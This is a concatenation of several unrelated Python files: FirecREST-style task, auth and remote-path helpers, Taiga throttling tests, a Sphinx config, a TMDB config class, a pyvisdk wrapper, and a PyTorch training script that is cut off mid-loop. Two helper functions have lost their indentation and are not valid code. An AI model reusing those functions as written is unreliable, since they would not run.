    return resp["hash_id"]
# function to call update task entry API in Queue FS
def update_task(task_id, headers, status, msg=None, is_json=False):
    """Update a task entry in the tasks (Queue FS) microservice.

    Sends the new status/message either as a JSON body (is_json=True)
    or as form data, and returns the parsed service response.
    """
    logging.info(f"Update {TASKS_URL}/{task_id} -> status: {status}")
    payload = {"status": status, "msg": msg}
    body_kwargs = {"json": payload} if is_json else {"data": payload}
    req = requests.put(f"{TASKS_URL}/{task_id}", headers=headers,
                       verify=(SSL_CRT if USE_SSL else False), **body_kwargs)
    return json.loads(req.content)
# function to call update task entry API in Queue FS
def expire_task(task_id, headers, service):
    """Mark a task as expired in the tasks (Queue FS) microservice.

    Args:
        task_id: hash id of the task to expire.
        headers: request headers; X-Firecrest-Service is set to `service`.
        service: name of the calling service.

    Returns:
        True on success, False if the request failed or returned a
        non-OK status.
    """
    logging.info(f"{TASKS_URL}/expire/{task_id}")
    try:
        headers["X-Firecrest-Service"] = service
        req = requests.post(f"{TASKS_URL}/expire/{task_id}",
                            headers=headers, verify=(SSL_CRT if USE_SSL else False))
    except Exception as e:
        logging.error(type(e))
        logging.error(e.args)
        # BUG FIX: previously execution fell through to `req.ok` with `req`
        # unbound after an exception, raising NameError; fail explicitly.
        return False
    if not req.ok:
        logging.info(req.json())
        return False
    return True
# function to check task status:
def get_task_status(task_id, headers):
    """Query the tasks microservice for the current status of a task.

    Returns the task's status string, or -1 on any error (non-200
    response, connection problem, or malformed response body).
    """
    logging.info(f"{TASKS_URL}/{task_id}")
    try:
        resp = requests.get(f"{TASKS_URL}/{task_id}",
                            headers=headers, verify=(SSL_CRT if USE_SSL else False))
        if resp.status_code != 200:
            return -1
        task_status = resp.json()["task"]["status"]
        logging.info(task_status)
        return task_status
    except Exception as e:
        logging.error(type(e), exc_info=True)
        logging.error(e)
        return -1
# checks if {path} is a valid file (exists and user in {auth_header} has read permissions)
def is_valid_file(path, headers, system_name, system_addr):
    """Check that {path} is a readable file for the requesting user.

    Probes access remotely with `head -c 1` (reads a single byte, output
    discarded). Returns {"result": True} on success, otherwise
    {"result": False, "headers": {...}} with an X-* header explaining why.
    """
    trace_id = headers.get(TRACER_HEADER, '')
    # checks user accessibility to path using head command with 0 bytes
    retval = exec_remote_command(headers, system_name, system_addr,
                                 f"ID={trace_id} head -c 1 -- '{path}' > /dev/null")
    logging.info(retval)
    if retval["error"] == 0:
        return {"result":True}
    error_str = retval["msg"]
    if retval["error"] == 113:
        return {"result":False, "headers":{"X-Machine-Not-Available":"Machine is not available"} }
    if retval["error"] == 124:
        return {"result":False, "headers":{"X-Timeout": "Command has finished with timeout signal"}}
    # error no such file
    if in_str(error_str,"No such file"):
        return {"result":False, "headers":{"X-Invalid-Path": f"{path} is an invalid path."}}
    # permission denied
    if in_str(error_str,"Permission denied") or in_str(error_str,"OPENSSH"):
        return {"result":False, "headers":{"X-Permission-Denied": "User does not have permissions to access machine or path"}}
    if in_str(error_str, "directory"):
        return {"result":False, "headers":{"X-A-Directory": f"{path} is a directory"}}
    return {"result":False, "headers":{"X-Error": retval["msg"]}}
# checks if {path} is a valid directory
# 'path' should exist and be accessible to the user (write permissions)
#
def is_valid_dir(path, headers, system_name, system_addr):
    """Check that {path} is a writable directory for the requesting user.

    Probes write access by touching a hidden temporary file whose name is
    the MD5 of a timestamp (so existing user files are never overwritten),
    then deletes it. Returns {"result": True} on success, otherwise
    {"result": False, "headers": {...}} with an X-* header explaining why.
    """
    # hidden probe file, unique per call via hashed timestamp
    timestamp = datetime.datetime.today().strftime("%Y-%m-%dT%H:%M:%S.%f")
    hasher = hashlib.md5()
    hasher.update(timestamp.encode("utf-8"))
    temp_name = f".firecrest.{hasher.hexdigest()}"
    trace_id = headers.get(TRACER_HEADER, '')
    retval = exec_remote_command(headers, system_name, system_addr,
                                 f"ID={trace_id} touch -- '{path}/{temp_name}'")
    logging.info(retval)
    if retval["error"] != 0:
        error_str = retval["msg"]
        if retval["error"] == 113:
            return {"result":False, "headers":{"X-Machine-Not-Available":"Machine is not available"} }
        if retval["error"] == 124:
            return {"result":False, "headers":{"X-Timeout": "Command has finished with timeout signal"}}
        # error no such file
        if in_str(error_str,"No such file"):
            return {"result":False, "headers":{"X-Invalid-Path": f"{path} is an invalid path."}}
        # permission denied
        if in_str(error_str,"Permission denied") or in_str(error_str,"OPENSSH"):
            return {"result":False, "headers":{"X-Permission-Denied": "User does not have permissions to access machine or path"}}
        # not a directory
        if in_str(error_str,"Not a directory"):
            return {"result":False, "headers":{"X-Not-A-Directory": f"{path} is not a directory"}}
        return {"result":False, "headers":{"X-Error": retval["msg"]}}
    # remove the probe file (best effort; result intentionally ignored)
    exec_remote_command(headers, system_name, system_addr,
                        f"ID={trace_id} rm -- '{path}/{temp_name}'")
    return {"result":True}
# wrapper to check if AUTH header is correct
# decorator use:
#
# @app.route("/endpoint", methods=["GET","..."])
# @check_auth_header
# def function_that_check_header():
# .....
def check_auth_header(func):
    """Decorator that rejects requests lacking a valid authorization header.

    Responds 401 when the header is missing or fails check_header();
    otherwise the wrapped view function is invoked normally.
    """
    @functools.wraps(func)
    def wrapper_check_auth_header(*args, **kwargs):
        auth_header = request.headers.get(AUTH_HEADER_NAME)
        if auth_header is None:
            logging.error("No Auth Header given")
            return jsonify(description="No Auth Header given"), 401
        if not check_header(auth_header):
            return jsonify(description="Invalid header"), 401
        return func(*args, **kwargs)
    return wrapper_check_auth_header
# check user authorization on endpoint
# using Open Policy Agent
#
# use:
# check_user_auth(username,system)
def check_user_auth(username,system):
    """Check user authorization on an endpoint via Open Policy Agent (OPA).

    Args:
        username: user to authorize.
        system: system the user wants to access.

    Returns:
        dict with "allow" (bool), "description" and "status_code".
        When OPA is disabled (OPA_USE falsy), access is always allowed.
    """
    # check if OPA is active
    if OPA_USE:
        try:
            # FIX: local variable `input` shadowed the builtin; renamed
            opa_input = {"input":{"user": f"{username}", "system": f"{system}"}}
            if debug:
                logging.info(f"OPA: enabled, using {OPA_URL}/{POLICY_PATH}")
            resp_opa = requests.post(f"{OPA_URL}/{POLICY_PATH}", json=opa_input)
            logging.info(resp_opa.content)
            if resp_opa.json()["result"]["allow"]:
                logging.info(f"User {username} authorized by OPA")
                return {"allow": True, "description":f"User {username} authorized", "status_code": 200 }
            else:
                logging.error(f"User {username} NOT authorized by OPA")
                return {"allow": False, "description":f"User {username} not authorized in {system}", "status_code": 401}
        except requests.exceptions.RequestException as e:
            logging.error(e.args)
            return {"allow": False, "description":"Authorization server error", "status_code": 404}
    return {"allow": True, "description":"Authorization method not active", "status_code": 200 }
# Checks each paramiko command output on an error execution
# error_str: stderr (or stdout) of the command
# error_code: errno of the command
# service_msg: service output in the "description" json response
def check_command_error(error_str, error_code, service_msg):
    """Map a failed remote command (exit code + stderr text) to a response dict.

    Args:
        error_str: stderr (or stdout) text produced by the command.
        error_code: errno / exit status of the command.
        service_msg: text for the "description" field of the JSON response.

    Returns:
        dict with "description", "status_code" (always 400) and "header"
        (a single X-* header entry describing the failure for the client).
        The checks are order-sensitive: known exit codes first, then
        substring matches on the error text, most specific first.
    """
    # -2 / 113: machine unreachable (different transports report differently)
    if error_code == -2:
        header = {"X-Machine-Not-Available": "Machine is not available"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if error_code == 113:
        header = {"X-Machine-Not-Available":"Machine is not available"}
        return {"description": service_msg, "status_code": 400, "header": header}
    # 124 is the exit status of `timeout` when the command was killed
    if error_code == 124:
        header = {"X-Timeout": "Command has finished with timeout signal"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if error_code == 118:
        header = {"X-Error": "Command execution is not allowed in machine"}
        return {"description": service_msg, "status_code": 400, "header": header}
    # When certificate doesn't match SSH configuration
    if in_str(error_str,"OPENSSH"):
        header = {"X-Permission-Denied": "User does not have permissions to access machine"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if in_str(error_str,"cannot access"):
        header={"X-Invalid-Path":"path is an invalid path"}
        return {"description": service_msg, "status_code": 400, "header": header}
    # "No such file": disambiguate by which utility produced the message
    if in_str(error_str,"No such file"):
        if in_str(error_str,"cannot stat"):
            header={"X-Not-Found":"sourcePath not found"}
            return {"description": service_msg, "status_code": 400, "header": header}
        # copy: cannot create, rename: cannot move
        if in_str(error_str, "cannot create") or in_str(error_str,"cannot move"):
            header = {"X-Invalid-Path": "sourcePath and/or targetPath are invalid paths"}
            return {"description": service_msg, "status_code": 400, "header": header}
        if in_str(error_str,"cannot remove"):
            header = {"X-Invalid-Path": "path is an invalid path."}
            return {"description": service_msg, "status_code": 400, "header": header}
        header={"X-Invalid-Path":"path is an invalid path"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if in_str(error_str,"cannot open"):
        header = {"X-Permission-Denied": "User does not have permissions to access path"}
        return {"description":service_msg, "status_code": 400, "header": header}
    if in_str(error_str,"Permission denied"):
        header = {"X-Permission-Denied": "User does not have permissions to access path"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if in_str(error_str,"directory"):
        header = {"X-A-Directory": "path is a directory, can't checksum directories"}
        return {"description": service_msg, "status_code": 400, "header": header}
    # if already exists, not overwrite (-i)
    if in_str(error_str,"overwrite"):
        header = {"X-Exists": "targetPath already exists"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if in_str(error_str,"not permitted"):
        header = {"X-Permission-Denied": "User does not have permissions to access path"}
        return {"description": service_msg, "status_code": 400, "header": header}
    # chown/chgrp/chmod argument validation errors
    if in_str(error_str,"invalid group"):
        header = {"X-Invalid-Group": "group is an invalid group"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if in_str(error_str,"invalid user"):
        header = {"X-Invalid-Owner": "owner is an invalid user"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if in_str(error_str, "invalid mode"):
        header = {"X-Invalid-Mode": "mode is an invalid mode"}
        return {"description": service_msg, "status_code": 400, "header": header}
    if in_str(error_str, "read permission"):
        header = {"X-Permission-Denied": "User does not have permissions to access path"}
        return {"description": service_msg, "status_code": 400, "header": header}
    # fallback: surface the raw error text to the client
    header = {"X-Error": error_str}
    return {"description": service_msg, "error": error_str, "status_code": 400, "header": header}
## Test if user provided text is not empty and has no invalid chars
def validate_input(text):
if text == None:
return "not specified"
if text == "":
return "is empty"
if re.search(FORBIDDEN_INPUT_CHARS, text) != None:
logging.warning(f'Forbidden char on: {base64.urlsafe_b64encode(text.encode()).decode()}')
return "has invalid char"
return ""
# formatter is executed for every log
class LogRequestFormatter(logging.Formatter):
def format(self, record):
try:
# try to get TID from Flask g object, it's set on @app.before_request on each microservice
record.TID = g.TID
except:
try:
record.TID = threading.current_thread().name
except:
record.TID = 'notid'
return super().format(record)
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014-2017 Andrey Antukh <niwi@niwi.nz>
# Copyright (C) 2014-2017 Jesús Espino <jespinog@gmail.com>
# Copyright (C) 2014-2017 David Barragán <bameda@dbarragan.com>
# Copyright (C) 2014-2017 Alejandro Alonso <alejandro.alonso@kaleidos.net>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.test import RequestFactory
from django.core.cache import cache
from django.contrib.auth.models import AnonymousUser
from taiga.base.throttling import CommonThrottle
from taiga.users.models import User
def test_user_no_write_throttling(settings, rf):
    """With the user-write rate disabled, write requests are never throttled."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
    req = rf.post("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    for _ in range(100):
        assert throttle.allow_request(req, None)
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
def test_user_simple_write_throttling(settings, rf):
    """A single user-write rate of 1/min allows one request, then rejects."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = "1/min"
    req = rf.post("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
def test_user_multi_write_first_small_throttling(settings, rf):
    """With multiple write rates (smallest first), the strictest one wins."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = ["1/min", "10/min"]
    req = rf.post("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
def test_user_multi_write_first_big_throttling(settings, rf):
    """With multiple write rates (largest first), the strictest one still wins."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = ["10/min", "1/min"]
    req = rf.post("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-write'] = None
def test_user_no_read_throttling(settings, rf):
    """With the user-read rate disabled, read requests are never throttled."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
    req = rf.get("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    for _ in range(100):
        assert throttle.allow_request(req, None)
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
def test_user_simple_read_throttling(settings, rf):
    """A single user-read rate of 1/min allows one request, then rejects."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = "1/min"
    req = rf.get("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
def test_user_multi_read_first_small_throttling(settings, rf):
    """With multiple read rates (smallest first), the strictest one wins."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = ["1/min", "10/min"]
    req = rf.get("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
def test_user_multi_read_first_big_throttling(settings, rf):
    """With multiple read rates (largest first), the strictest one still wins."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = ["10/min", "1/min"]
    req = rf.get("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
def test_whitelisted_user_throttling(settings, rf):
    """A whitelisted user id bypasses the user-read throttle entirely."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = "1/min"
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = [1]
    req = rf.get("/test")
    req.user = User(id=1)
    throttle = CommonThrottle()
    for _ in range(2):
        assert throttle.allow_request(req, None)
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_not_whitelisted_user_throttling(settings, rf):
    """A user id not on the whitelist is throttled normally."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = "1/min"
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = [1]
    req = rf.get("/test")
    req.user = User(id=2)
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['user-read'] = None
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_anon_no_write_throttling(settings, rf):
    """With the anon-write rate disabled, anonymous writes are never throttled."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
    req = rf.post("/test")
    req.user = AnonymousUser()
    throttle = CommonThrottle()
    for _ in range(100):
        assert throttle.allow_request(req, None)
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
def test_anon_simple_write_throttling(settings, rf):
    """An anon-write rate of 1/min allows one anonymous write, then rejects."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = "1/min"
    req = rf.post("/test")
    req.user = AnonymousUser()
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
def test_anon_multi_write_first_small_throttling(settings, rf):
    """With multiple anon-write rates (smallest first), the strictest one wins."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = ["1/min", "10/min"]
    req = rf.post("/test")
    req.user = AnonymousUser()
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
def test_anon_multi_write_first_big_throttling(settings, rf):
    """With multiple anon-write rates (largest first), the strictest one still wins."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = ["10/min", "1/min"]
    req = rf.post("/test")
    req.user = AnonymousUser()
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-write'] = None
def test_anon_no_read_throttling(settings, rf):
    """With the anon-read rate disabled, anonymous reads are never throttled."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
    req = rf.get("/test")
    req.user = AnonymousUser()
    throttle = CommonThrottle()
    for _ in range(100):
        assert throttle.allow_request(req, None)
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
def test_anon_simple_read_throttling(settings, rf):
    """An anon-read rate of 1/min allows one anonymous read, then rejects."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
    req = rf.get("/test")
    req.user = AnonymousUser()
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
def test_anon_multi_read_first_small_throttling(settings, rf):
    """With multiple anon-read rates (smallest first), the strictest one wins."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = ["1/min", "10/min"]
    req = rf.get("/test")
    req.user = AnonymousUser()
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
def test_anon_multi_read_first_big_throttling(settings, rf):
    """With multiple anon-read rates (largest first), the strictest one still wins."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = ["10/min", "1/min"]
    req = rf.get("/test")
    req.user = AnonymousUser()
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
def test_whitelisted_anon_throttling(settings, rf):
    """An anonymous client from a whitelisted IP bypasses the anon-read throttle."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = ["127.0.0.1"]
    req = rf.get("/test")
    req.user = AnonymousUser()
    req.META["REMOTE_ADDR"] = "127.0.0.1"
    throttle = CommonThrottle()
    for _ in range(102):
        assert throttle.allow_request(req, None)
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_not_whitelisted_anon_throttling(settings, rf):
    """An anonymous client from a non-whitelisted IP is throttled normally."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = ["127.0.0.1"]
    req = rf.get("/test")
    req.user = AnonymousUser()
    req.META["REMOTE_ADDR"] = "127.0.0.2"
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_whitelisted_subnet_anon_throttling(settings, rf):
    """An anonymous client inside a whitelisted subnet bypasses the throttle."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = ["192.168.0.0/24"]
    req = rf.get("/test")
    req.user = AnonymousUser()
    req.META["REMOTE_ADDR"] = "192.168.0.123"
    throttle = CommonThrottle()
    for _ in range(102):
        assert throttle.allow_request(req, None)
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
def test_not_whitelisted_subnet_anon_throttling(settings, rf):
    """An anonymous client outside the whitelisted subnet is throttled normally."""
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = "1/min"
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = ["192.168.0.0/24"]
    req = rf.get("/test")
    req.user = AnonymousUser()
    req.META["REMOTE_ADDR"] = "192.168.1.123"
    throttle = CommonThrottle()
    assert throttle.allow_request(req, None)
    for _ in range(101):
        assert throttle.allow_request(req, None) is False
    cache.clear()
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_RATES']['anon-read'] = None
    settings.REST_FRAMEWORK['DEFAULT_THROTTLE_WHITELIST'] = []
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# make the project root importable so autodoc can find the package
sys.path.insert(0, os.path.abspath('..'))
# -- Project information -----------------------------------------------------
project = 'pipcs'
copyright = '2021, Göktuğ Karakaşlı'
author = 'Göktuğ Karakaşlı'
# -- General configuration ---------------------------------------------------
# imported so the theme package is available; also listed in `extensions`
import sphinx_rtd_theme
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx_rtd_theme',
    'sphinx.ext.autodoc',
    'sphinx.ext.autosummary',
    'sphinx.ext.coverage',
    'sphinx.ext.napoleon',
    'sphinx.ext.viewcode'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'build', 'dist', '*.egg-info']
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# document that contains the root toctree (older Sphinx defaults to 'contents')
master_doc = 'index'
|
class Config:
    '''
    General configuration parent class
    '''
    # TMDB movie endpoint template: format with (movie_id, api_key)
    MOVIE_API_BASE_URL = 'https://api.themoviedb.org/3/movie/{}?api_key={}'
class ProdConfig(Config):
    '''
    Production configuration child class

    Args:
        Config: The parent configuration class with General configuration settings
    '''
    # no production-specific overrides yet; inherits everything from Config
    pass
class DevConfig(Config):
    '''
    Development configuration child class

    Args:
        Config: The parent configuration class with General configuration settings
    '''
    # enable debug mode during development
    DEBUG = True
|
from pyvisdk.base.managed_object_types import ManagedObjectTypes
from pyvisdk.base.base_entity import BaseEntity
import logging
########################################
# Automatically generated, do not edit.
########################################
log = logging.getLogger(__name__)
class LocalizationManager(BaseEntity):
    '''This managed object type presents all the message catalogs for client-side
    localization of messages.'''
    def __init__(self, core, name=None, ref=None, type=ManagedObjectTypes.LocalizationManager):
        # thin generated wrapper: binds the managed-object type so BaseEntity
        # can resolve this entity's properties
        super(LocalizationManager, self).__init__(core, name=name, ref=ref, type=type)
    @property
    def catalog(self):
        '''Fetches the descriptions of all the client-side localization message catalogs
        available for the current session locale.'''
        # delegates to BaseEntity.update to fetch the 'catalog' property
        return self.update('catalog')
|
import os
import time
import torch
import numpy as np
import torch.nn as nn
import cv2
from torchinfo import summary
from torch.utils.data import DataLoader
import source.logger as logger
from source.model import FusionNet, UNet
from source.dataset.dataset import NucleiCellDataset
import source.utils as utils
import source.arguments as arguments
def main(m_args):
    """Train a nuclei/cell segmentation network end to end.

    Builds the train/validation datasets and dataloaders, constructs the
    requested model (FusionNet or UNet), resumes from an existing checkpoint
    when one is present, then runs the training loop with periodic
    validation, best-model checkpointing and TensorBoard logging.

    Args:
        m_args: parsed command-line arguments (see source.arguments).
    """
    # Name model
    model_name = utils.get_model_name(m_args)
    # Tensorboard
    logger_tb = logger.Logger(log_dir=model_name)
    # Get dataset
    train_dataset = NucleiCellDataset(m_args.train_data,
                                      phase="train",
                                      transform=m_args.transform,
                                      image_size=m_args.image_size)
    validation_dataset = NucleiCellDataset(m_args.train_data,
                                           phase="validation",
                                           transform=m_args.transform,
                                           image_size=m_args.image_size)
    # Create dataloader
    train_dataloader = DataLoader(train_dataset,
                                  batch_size=m_args.batch_size,
                                  shuffle=True,
                                  num_workers=m_args.num_workers,
                                  pin_memory=True)
    val_dataloader = DataLoader(validation_dataset,
                                batch_size=m_args.batch_size,
                                shuffle=False,
                                num_workers=m_args.num_workers,
                                pin_memory=True)
    # Device: fall back to CPU when CUDA is unavailable.  Both branches now
    # yield a torch.device for consistency (the original mixed a device with
    # the bare string "cpu").
    device = torch.device("cuda:" + m_args.gpu_ids) \
        if torch.cuda.is_available() else torch.device("cpu")
    # Model
    if m_args.model == "fusion":
        model = FusionNet(m_args, train_dataset.dim)
    else:
        model = UNet(m_args.num_kernel, m_args.kernel_size, train_dataset.dim,
                     train_dataset.target_dim)
    summary(model)
    print(list(model.parameters())[0].shape)
    print("total number of training examples", str(len(train_dataset)))
    print("total number of validation examples", str(len(validation_dataset)))
    print("length of train data loader", str(len(train_dataloader)))
    print("length of validation data loader", str(len(val_dataloader)))
    model = model.to(device)
    # Peek at one batch to sanity-check the input shape.
    # BUG FIX: DataLoader iterators implement __next__, not .next(); the old
    # `dataiter.next()` raises AttributeError on current PyTorch / Python 3.
    dataiter = iter(train_dataloader)
    imgs, _, _ = next(dataiter)
    imgs = imgs.float().to(device)
    print(imgs.shape)
    # logger_tb.update_graph(model, imgs)
    # Optimizer
    parameters = model.parameters()
    if m_args.optimizer == "adam":
        optimizer = torch.optim.Adam(parameters, m_args.lr)
    else:
        optimizer = torch.optim.SGD(parameters, m_args.lr)
    # Loss
    criterion = nn.CrossEntropyLoss()
    criterion = criterion.to(device)
    count = 0
    # Resume from a checkpoint when one exists; `count` is the global step.
    try:
        cp_p = os.path.join("output/", m_args.experiment_name,
                            model_name + ".pth.tar")
        count = utils.load_checkpoint(torch.load(cp_p), model, optimizer)
        print("Train from a previous checkpoint...")
    except FileNotFoundError:
        print("No checkpoint found, start training from step 0...")
    # Train model
    model.train()
    best_valid_loss = float("Inf")
    total_time_min, total_time_sec = 0.0, 0.0
    global_steps_list = []
    for epoch in range(m_args.epoch):
        start_time = time.time()
        total_loss = []
        for i, (x_train, y_nuclei, y_cell) in enumerate(train_dataloader):
            optimizer.zero_grad()
            if m_args.target_type == "nuclei":
                y_train = y_nuclei
            else:
                y_train = y_cell
            # Send data and label to device
            x = x_train.to(device)
            # Input should be between 0 and 1
            x = torch.div(x, 255)
            y = y_train.to(device)
            # Predict segmentation
            pred = model(x).squeeze(1)
            # Calculate loss
            loss = criterion(pred, y.long())
            total_loss.append(loss.item())
            # Get the class with the highest probability
            _, pred = torch.max(pred, dim=1)
            # Back prop
            loss.backward()
            optimizer.step()
            # Log the running mean training loss for this epoch so far.
            avg_loss = np.mean(total_loss)
            count += 1
            logger_tb.update_value("steps vs train loss", avg_loss, count)
            global_steps_list.append(count)
            # Display segmentation on tensorboard (first batch of each epoch).
            if i == 0:
                original = x_train[i].detach().cpu().numpy()
                truth = y[i].squeeze().detach().cpu().numpy()
